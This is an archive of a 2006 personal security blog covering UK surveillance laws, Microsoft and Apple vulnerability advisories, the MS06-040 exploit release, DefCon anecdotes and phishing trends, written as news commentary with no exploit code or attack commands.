Tuesday, August 29, 2006

Big Brother Gone Mad?

The government knows exactly how much trash you throw out and of what type. This isn't some movie trick, this is the real world.

Electronic spy 'bugs' have been secretly planted in hundreds of thousands of household wheelie bins.

The gadgets - mostly installed by companies based in Germany - transmit information about the contents of the bins to a central database which then keeps records on the waste disposal habits of each individual address.

Already some 500,000 bins in council districts across England have been fitted with the bugs - with nearly all areas expected to follow suit within the next couple of years.

Until now, the majority of bins have been altered without the knowledge of their owners. In many cases, councils which ordered the installation of the devices did not even debate the proposals publicly.

The official reason for the bugs is to 'improve efficiency' and settle disputes between neighbours over wheelie-bin ownership. But experts say the technology is actually intended to enable councils to impose fines on householders who exceed limits on the amount of non-recyclable waste they put out. New powers for councils to do this are expected to be introduced by the Government shortly.

But the revelation that the bins have already been altered ignited a 'Bin Brother' row over privacy and taxes. Conservative MP Andrew Pelling said burglars could hack into the computer system to see if sudden reductions in waste at individual households meant the owners were on holiday and the property empty.

He said: 'This is nothing more than a spy in the bin and I don't think even the old Soviet Union made such an intrusion into people's personal lives.

'It is Big Brother gone mad. I think a more British way of doing things is to seek to persuade people rather than spy on them.'

Has Big Brother in the UK gone mad?

Section 3 of the RIP Act, cameras on every corner of the UK, traffic tickets based on camera time calculations, etc.

I am a firm believer in the balance. The government has a right and a duty to protect its people, but it is also the duty of the public to keep the government in check, which means the general public should want to be informed, should want to know what is going on, they should get involved as much as possible.

Monday, August 28, 2006

Emerging Shifts in Cyberwar Tactics

Via FCW.com -

Cyberwar is changing, and network defense must adapt, two leading executives told a military audience at the Air Force Information Technology Conference at Auburn University’s Montgomery campus earlier this month.

“We are at a much more dangerous place today than we were four or five years ago,” said Steve Ballmer, Microsoft’s chief executive officer. The perpetrators of cyberattacks have shifted in recent years from amateur hackers seeking notoriety to organized criminal enterprises with financial or hostile goals, he said.

John Thompson, Symantec’s CEO, said today’s cybercriminal is interested in “perpetrating silent, highly targeted attacks to steal sensitive personal, financial and operational information.” That new criminal tactic marks a shift away from large-scale virus or worm attacks. The number of such attacks dropped from about 100 between 2002 and 2004 to only six last year, he said.

Responses to cyberattacks are evolving, too, Ballmer said. In the past, experts worked to close vulnerabilities in programs and shorten release times for upgrades and patches. Now they focus on building systems that intruders cannot penetrate, he said.

That new defense strategy requires abandoning the suit-of-armor approach, in which developers added layers of protection to keep information safe.

Those layers restricted data access, hampering real-time use and mission performance, Thompson said. Effective cyberdefense will depend on a combination of protecting the IT infrastructure, information and interactions among people using the information, he added.

Standardized data formats and a common software infrastructure are crucial to IT infrastructure protection, Thompson said. Organizations must be sure to transfer data to backup systems to be ready for natural or man-made disasters. “After all, servers and laptop [computers] can be replaced. The information on them most likely cannot,” he said.

Disgruntled or careless employees can do significant damage, so organizations must monitor transactions to instantly combat suspicious or dangerous activity, Thompson said. For example, comply-and-connect mechanisms can verify user identity, he said. The proliferation of wireless devices and telework requires increasingly sophisticated approaches to certification and authentication, he added.

The next cyberwar battle will be fought over unstructured data, including e-mail messages, instant messages, Microsoft PowerPoint and Word documents, and voice-over-IP conversations, which compose 80 percent to 90 percent of data accessible via the Internet, Thompson said.

While I agree with Josh's conclusion that the tactics of cyberwar are changing, I do not agree that corporations or people should abandon the "defense in depth" idea. Perhaps I am reading too much into this sentence - "That new defense strategy requires abandoning the suit-of-armor approach, in which developers added layers of protection to keep information safe."

Corporations must remember that the cyberwar is not a "single-front" war. It has to be defended on multiple fronts at the same time. Investing in new cutting-edge hardware isn't enough, you must invest in your corporate "software" (aka your employees).

Sunday, August 27, 2006

A Day in Amsterdam

New PoC Virus Takes Aim @ AMD Processors

Via Computing.co.uk -

Security researchers at Symantec have discovered a new proof of concept virus that targets processors AMD rather than operating systems.

The worm comes in two versions, targeting 32-bit and 64-bit processors from AMD. Symantec refers to the online pests as w32.bounds and w64.bounds. Because it involves proof of concept code, both viruses are rated as low level threats.

Although at this point it concerns harmless proof of concept code, the virus could be used as a starting point for creating malware that affects computers regardless of the operating system that they run, cautioned Vincent Weafer, senior director of Symantec's Security Response Group.

It was only a manner of time.

Thursday, August 24, 2006

Tools of the Trade - Mini

Wireshark (formerly Ethereal) 0.99.3 has been released.

Some vulnerabilities have been reported in Wireshark, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

  1. An unspecified error within the SCSI protocol dissector can be exploited to crash the application.
  2. Off-by-one errors exist in the IPSec ESP preference parser. Successful exploitation requires that Wireshark has been compiled with ESP decryption support.
  3. Errors in the DHCP dissector and potentially other protocol dissectors can be exploited to crash Wireshark due to a bug in Glib. This only affects the Windows version.
  4. An error within the Q.2391 dissector can be exploited to cause a DoS due to memory consumption. Successful exploitation of the vulnerabilities may cause Wireshark to stop responding, consume large amounts of system memory, crash, or execute arbitrary code.

Full Secunia Advisory & Original Wireshark Advisory

This "Tools of the Trade" is very small due to my current location, but just wanted to share this one to everyone.

Wednesday, August 23, 2006

Nothing like the Smell of Internet Tubes in the Morning

Via blogs.ittoolbox.com -

If you use any number of popular web forums or even some commercial services like classmates.com, amazon.com, netzero.com or your provider's webmail service, you may not be aware that you're sending your credentials over the internet in the clear.

Some sites appear to secure your credentials, but they really don't. Some offer SSL sign-ins, but don't make them the default. Others don't even make an attempt to use proper SSL encryption or any attempt to obscure the credentials.

Remember the wall of sheep from DefCon? All of those people that kept logging into net resources assuming that nobody was listening? They were wrong!

Defcon's Wall of Sheep was full of Myspace passwords this year. Freaking crazy.

This above blog isn't pointing out anything new or "super-leet", but it is providing a much needed reminder to the security world. SSL can be very effective if used properly. Imporper use and you create a false sense of secuirty.

Check out Number 8 in the OWASP Top 10 Web Applications Vulnerabilites.

Monday, August 21, 2006

Pluto Debate

I do not think Pluto or Xena should be planets or "plutons" or whatever. Thats all I am going to say on that.

TheStar.com - Why Mississauga is a pluton

ASCO Report Recommends More Open Source for the DoD

The Department of Defense has a problem and the only cure is more "cowbell"....wait a tick, I mean more Open Source Software.

The Advanced Systems and Concept Office (ASCO) recently released a report that recommends the Department of Defense to use and develop Open Source technologies.

The report was titled "Open Technology Development" and was prepared for Ms. Sue Payton, Deputy Under Secretary of Defense. (Full PDF).

It is good to see a group pushing the cultural shift that will be needed to use OSS in the government.

I also like the see the smart use of my tax money. ;)

Wednesday, August 16, 2006

Technocrat Goes to Europe

Well, I am off to Europe tomorrow. I will be in Paris most of the weekend and then will be working in London most of next week. For those readers in France and the UK, yet yell at me if you want to meet for a pint. =)

Due to my traveling, blogging will be light for the couple of weeks.

Fun: Bruce Schneier Facts

Dennis Henderson posted this on the FunSec mailing list this morning. Putting the fun back in Security.

This is just too funny not to share. I am sure we have all heard the Chuck Norris jokes...but here they are again with a tech angle. Good stuff, all in good fun of course.


I really liked these:

"Bruce Schneier was only allowed to view the Kryptos sculpture at Langley for 1 second, in order not to spoil the fun other cryptographers. It was 0.9 seconds too much. "

"The nuclear launch codes held by the President of the United States are secured by an unbreakable system: a plain brown envelope with a picture of Bruce Schneier on the flap. "

"Bruce Schneier's Twofish algorithm has 16 rounds, but he always gets a knockout in the first."

UK Home Office to Enable Part 3 of the RIP Act

"Give us your private encryption keys...your keys beyond to us!"

Or at least that is what the UK government will be telling its citizens soon.

The UK's Home Office is seeking to turn on Part 3 of the Regulation of Investigatory Powers Act of 2000 (RIP or RIPA) very soon.

Part 3 of the RIP Act gives the police powers to order the disclosure of encryption keys or force suspects to decrypt encrypted data.

Anyone who refuses to hand over a key to the police would face up to two years of imprisonment. Under current antiterrorism legislation, terrorist suspects now face up to five years for withholding keys.

Please note this part of a recent ZDNet article.

Casper Bowden, a former director of the FIPR who led the fight against the introduction of the RIP Act several years ago, said during the meeting that Part 3 is flawed because defendants could be prosecuted for simply losing an encryption key.

"The burden of proof is on the suspect to prove that they don't have the key, and if they fail, they go to prison. But if they can give an explanation for not having the key, then the prosecution must prove beyond reasonable doubt that they are lying," Bowden said.

I understand why police want this power, but in my view...this is too wide and seems like it could be abused in a huge way by many groups of people.

Wikipedia shares this little piece of information as well.

In September 2003, Home Secretary David Blunkett announced wide-ranging extensions to the list of those entitled to see information collected under the RIPA. The list now includes jobcentres, local councils, and the Chief Inspector of Schools. Civil rights and privacy campaigners have dubbed these extensions a "snoopers' charter".

Here is the full text of the RIP Act of 2000.

Rickard Falkvinge, chairman of the Sweden's Pirate Party, might have said it best in this WiredFire.org article about about DarkNets.

"There are many legitimate reasons to want to be completely anonymous on the Internet" going on to add "If the government can check everything each citizen does, nobody can keep the government in check. The right to exchange information in private is fundamental to the democratic society. Without a safe and convenient way of accessing the Internet anonymously, this right is rendered null and void."

Sunday, August 13, 2006

Global MS06-040 Worm - Could it happen?

Sure it is very possible that the MS06-040 exploit could be used in a Sasser/MSBlast type of global worm...but I don't think it will happen. Why?

The LURHQ Threat Intelligence Group just released a great write-up on this exact issue and I see no reason to create the wheel again.

This make it very clear that botnet owners will add this exploit into their bots....it is would be silly on their part to not do it. This exploit could help them spread their botnets a bit more....but I don't see how they could get more than 5% or 10% growth, if even that much. LURHQ has already detected a Mocbot variant using MS06-040 to spread.

As LURHQ stated, machines with low service pack levels are most likely already owned by something or someone.

Let’s get down to the real issue however.

Why do holes like this exist in Windows?

It isn't because hackers find them…or because smart people make exploits for them....it is Microsoft shipped a product with vulnerable code and we all ran out to the store and got it. In essence, Microsoft put them there.

Hackers don’t inject buffer overflow or format string holes into code…they find what is already there. It would be easier to find these problems, since they have the source code…but it takes hackers looking around in binary code to find these issue and then they are the ones to blame? Interesting view…

Word around the campfire is that Microsoft has taken account of its faults and is attempting to reduce these threats with Vista. Good to hear and kudos to Microsoft for one of the largest security audits ever (or so I hear).

Of course, these issues are not just Microsoft’s problem. Software firms that build and release software for public or corporate use encounter the same issue on a daily basis. So in the end, it is in the hands of the programmers at these companies.

I know some companies have yearly security training for the programming staff, but sadly many do not. Times change and new things are discovered…so no code will ever be perfect but it is the duty of these companies to protect their customers and therefore it just makes sense to keep their programmers on the cutting edge of security.

I went to a fairly small college, but rarely did I hear the word “security” in any of my programming classes. I never saw a class called “Secure Coding Practices” or “Building Secure Software for the Future”. So perhaps some of the fault falls to the education system and to the teachers…but I can only assume things have changed since I finished college almost 4 years ago.

Some things change...and some things always stay the same...

Saturday, August 12, 2006

Defcon 14: Best Spot the Fed Ever!

Ok, I heard about this one while at Defcon, but I didn't personally see it. Perhaps someone can personally account for this event, but it is still a great story. Either way. It has to be the best Spot the Fed ever.

Gadi Evron just posted the small event that happened up on stage. Here it is again...

Not exact quotes:

Priest: “So, what makes you suspect this guy is a fed?”
Girl: “I don’t suspect, I know.”
Priest: “How do you know?”
Girl: “Yesterday after I slept with him, I went through the things in his bag and found his badge.”
Priest: “Are you saying you slept with him last night?”
Girl: “Yes. Can I get my T-shirt now?”

I can add to this a bit. She roughly said that she met him, got drunk with him at the bar, slept with him and then while he was sleeping, she went through his things. Great story. lol

I think Priest said the guy was a Marine.


Friday, August 11, 2006

Dept of Transporation Stolen - 133,000 identifies

Via SecurityFocus -

A federal agent's stolen laptop in Florida has put 133,000 people's personal identities at risk.

In what is becoming a regular occurrance with U.S. government and military organizations, the laptop was stolen from a vehicle and contained sensitive personal information on individuals that was not encrypted in any way.

The Miami Herald is reporting the annoucment by the federal U.S. Department of Transportation, which discovered the theft on July 27th. The department claims the data had been previously encrypted, but was not encrypted at the time the laptop was stolen. The data contains the names, addresses, birthdates and Social Security numbers of Florida citizens. A second laptop was stored in the vehicle but was not stolen, puzzling investigators.

Recent laptop thefts have affected a number of U.S. agencies, including the U.S. Navy and the high-profile theft at the U.S. Department of Veteran Affairs that contained the identities of 26.5 million veterans. Back in June, the U.S. government issued a memo mandating the use of encryption and two-factor authentication on civilian government computers containing sensitive information.

This is my favorite quote of the day - "The department [of Transportation] claims the data had been previously encrypted, but was not encrypted at the time the laptop was stolen."

Why even bring that fact up?

Thursday, August 10, 2006

MS06-040 Public Exploit - UPDATED

Metasploit has added an exploit for the buffer overflow vulnerability in the Microsoft Windows Server service (MS06-40).


This module exploits a stack overflow in the NetApi32 NetpIsRemote() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.

US-CERT recommends users and administrators apply the appropriate updates in Microsoft Security Bulletin MS06-040 as soon as possible.

More information about this vulnerability can be found in Vulnerability Note VU#650769 and Technical Cyber Security Alert TA06-220A.

I have heard about the campfire that Core Impact has also released a MS06-040 exploit module to their customers.

eEye Digital Security has released Retina MS06-040 NetApi32 Scanner. It can be used to find machines on your network that are still open to attack.

You may remember eEye from the third-party WMF patch media event.

** UPDATE **

I have already spotted several hits on this blog from people that found me via a Blogger search of "MS06-040 exploits". Why are they looking? Who knows...but everyone should patch'em if you got'em.

UK and US Push for More Security Measures on Airplanes

Ok, this is getting a little silly, seriously. Here is the rundown.

Via News24 - Britain went on its highest alert for terrorist attacks early on Thursday after the discovery of a plot to blow up several planes flying between Britain and the United States.

The level of alert was raised to "critical" from "severe" as airport security was tightened.
British police earlier announced they had thwarted a major terrorist plot to allegedly blow up aircraft.

The plan was uncovered in a joint operation by Scotland Yard's anti-terrorist branch and security service, the Metropolitan Police said. British television said about 20 arrests had been made.

Sounds good, nice work Scotland yards. But wow wow...now the US is matching the new measures put in place by the UK on hand baggage.

Via ElectricNews - A British government statement said passengers would not be allowed to take on board any hand luggage except essential items in see-through bags. The U.S. Department of Homeland Security announced it was taking similar steps, including barring passengers from carrying liquids, including drinks, hair gel and lotions, on planes.

Are they serious? How about we fix whatever caused the TSA and TSA-like agencies to miss these serious security issues? I am a firm believer that everyone in the country should do their part to protect the country but when is the line reached?

I can only assume this plot has something to do with liquids....but what makes everyone in the world assume that what the terrorists attempt to do in the UK will be copied by those in the US?

I am pretty sure these terrorist groups are smart enough to run two different plots in two different nations against two different mode of transportation. But that is just my 2 cents.

So lets all go to the airport with a clear bag...makes me feel like I am a girl working at the Dillards in the local mall.

Wednesday, August 9, 2006

Wireless Device Driver Vulnerabilities

Ok, I have read several media write-ups about the speech given by Dave Maynor and "Johnny Cache" at Blackhat / Defcon and I have to say a couple of things.

Most of these articles are focusing WAY too much on the operating system used. Yes, it was running OS X.

Big deal, get over it. Who told everyone that Apple computers are totally secure and un-hackable? It wasn't me, that is for sure.

The truth is Apple computers have been hacked, rooted and used in botnets for some time now, this is pure fact. Like all computers/operating system, Apples are open to attack given the correct conditions. Accept this statement or not, but this is the truth.

The speech is was designed to point out very serious code problems in device drivers, which can lead to the complete compromise of the operating system since drivers normally run at SYSTEM / Kernel level access.

Sure, it is flashy to use wireless device drivers to prove this point, but the real problem goes way beyond wireless. Attacking device drivers isn't a new idea in the security world, but it hasn't been taken very serious by the media or the manufacturers until now.

So lets all stop making a point about which OS does that...or it wouldn't work on this because of blah and lets all focus on the real issue.

Device drivers across all platforms have not been properly code audited and are a fresh new hacking ground.

Intel has released new wireless drivers recently, yet Apple seems to be working harder on keeping everyone quiet about the issue instead of fixing it.

Do OS X users really feel that Apple is keeping quiet to protect them? I don't see how. Apple is keeping everyone quiet to cover their bottomline...not the OS X faithful.

With all that being said, the video is quite amazing.

See the full media coverage at the SecureWorks website.

Tuesday, August 8, 2006

Black Tuesday - Microsoft Security Updates for Aug 2006

As part of Microsoft's routine, monthly security update cycle we released the following 12 security updates on August 8, 2006:

  • MS06-040 - Critical - Vulnerability in Server Service Could Allow Remote Code Execution
  • MS06-041 - Critical - Vulnerability in DNS Resolution Could Allow Remote Code Execution
  • MS06-042 - Critical - Cumulative Security Update for Internet Explorer
  • MS06-043 - Critical -Vulnerability in Microsoft Windows Could Allow Remote Code Execution
  • MS06-044 - Critical - Vulnerability in Microsoft Management Console Could Allow Remote Code Execution
  • MS06-045 - Important - Vulnerability in Windows Explorer Could Allow Remote Code Execution
  • MS06-046 - Critical - Vulnerability in HTML Help Could Allow Remote Code Execution
  • MS06-047 - Critical - Vulnerability in Microsoft Visual Basic for Applications Could Allow Remote Code Execution
  • MS06-048 - Critical - Vulnerabilities in Microsoft Office Could Allow Remote Code Execution
  • MS06-049 - Important - Vulnerability in Windows Kernel Could Result in Elevation of Privilege
  • MS06-050 - Important - Vulnerabilities in Microsoft Windows Hyperlink Object Library Could Allow Remote Code Execution
  • MS06-051 - Critical - Vulnerability in Windows Kernel Could Result in Remote Code Execution

Mad Props to Austin's Pedram Amini of the TippingPoint Security Research Team for reporting the Hyperlink Object Buffer Overflow Vulnerability - CVE-2006-3086.

Go get'em @ WindowsUpdate

Political Hacking News

Via Breitbart.com -

Democratic Sen. Joe Lieberman, who was locked in a battle with a political novice fueled by anti-war sentiment in the nation's most closely watched primary race Tuesday, accused his challenger's supporters of hacking his campaign Web site and e-mail system.

Lieberman campaign manager Sean Smith said the campaign has contacted the Connecticut attorney general's office and asked for a criminal investigation by state and federal authorities.

Via Kxan.com -

An Austin company is caught in the crossfire of the Mid-East war as Hezbollah's terror reaches Central Texas.

Broadwing Communications essentially threw Hezbollah off of the Internet this week. It came after the discovery that terror propaganda was linking to the company's network.

Interesting indeed....

Monday, August 7, 2006

Blackhat & Defcon in Photos

ZDI Party @ Body English

ZDI Party @ Body English

Microsoft Party @ Pool at the Palms

Microsoft AfterParty @ Rain

View from the Limo @ 4am

Entry @ Caesars Palace

Defcon Stuff

People @ a Defcon Speech

Wall of Sheep

CTF Results

Cute Roller-girl

How to "Bump" open locks...

SensePost releasing Suru and LR

Wednesday, August 2, 2006

Apple OSX Fetchmail Buffer Overflow

KF is at it again, reminding the public that security isn't just about which operating system you use.....

DMA[2006-0801a] - 'Apple OSX fetchmail buffer overflow'

Author: Kevin Finisterre


Product: 'Mac OSX <=10.4.7'


fetchmail-SA-2005-01 states that 'In fetchmail-6.2.5 and older, very long UIDs can cause fetchmail to crash, or potentially make it execute code placed on the stack. In some configurations, fetchmail is run by the root user to download mail for multiple accounts.'. The authors of fetchmail made patches for these issues available to the public on 2005-07-21.

In defiance of a 'very proactive approach to security' Apple's OSX remained unpatched for approximately one year after the vendor supplied patches were made available. Shortly after the vendor disclosure of this bug exploits were made available by The Mantis Project (bannedit (at) frontiernet (dot) net [email concealed]). Conicidentally a recent paper was written about exploiting buffer overflows and this vulnerability was used as an example:

See the released exploit information here.

Yet another example of how OS X users can be vulnerable to attack because Apple doesn't patch its own use of open source software. It isn't the first time and I bet it won't be the last.

Tuesday, August 1, 2006

Blackhat & Defcon

Well, I am off to Vegas tomorrow...it is going to be a crazy week. If anyone wants to meet up for drinks...just let me know.

Interesting Quote: Sunshine

Recently Japan released its annual defense report, which featured both China and North Korea prominently. No suprises there really.

Foreign Ministry spokesman Tomhiko Taniguchi says openness from Beijing would help dispel concerns about China's military modernization. China has rapidly increased military spending in the past decade.

"Sunshine is the best disinfectant and you have to be very much transparent," he said. "The Defense Agency and the Foreign Ministry, as well, are requesting China reveal everything that is going on in terms of defense buildup and the amount of defense budget and what sort of equipment and weaponry the Chinese military is using."

Take Mr. Taniguchi's quote out of the military context and it still very powerful.

"Sunshine is the best disinfectant..."

These five simple words say so much.

It can be compared to many other sayings about completely different subjects:
  • "Truth can set you free..."
  • "Knowing is half the battle..."
  • Art of War by Sun Tsu - "So it is said that if you know your enemies and know yourself, you will not be imperiled in a hundred battles; if you do not know your enemies but do know yourself, you will win one and lose one; if you do not know your enemies nor yourself, you will be imperiled in every single battle."
  • The famous Linus's Law, "given enough eyeballs, all bugs are shallow"
  • The vulnerability full disclosure theory - details of a security vulnerability are disclosed to the public, including details of the vulnerability and how to detect and exploit it
  • etc, etc, etc

All of these are saying one thing.....Information is power.

So true. But this also means that Mis-information is power....something to remember.

Scammers deploy Bots for eBay manipulation

Via Vuunet.com -

Scammers have turned to automated bots to create Ebay accounts with a positive feedback record, reports security vendor Fortinet.

Online criminals use the automated scripts or bots to create vast collections of user accounts with positive feedback records. Those accounts can then be used to attract buyers by offering high value items that are never delivered after the bot-master criminals have received payments.

It was only a matter of time. Scammers and phishers have fine-tuned their social engineering skills in the last couple of years. Phishing sites are becoming more "real" as more and more of them use account checking scripts and IE toolbar spoofing.

They know what it takes to trick the normal person and usually don't take the time to trick the "good guys". Many times, I see comments in the phish page itself that tell me when and where they mirrored the site from. This is nice, since some of the phish are focused on local regional brands.

The backend control scripts normally contain any e-mail addresses used and perhaps their group name...

I always love to see comments like C:\Documents and Settings\Claude\update-phish.php in phishing sites...lol Way to go Claude! Nice work...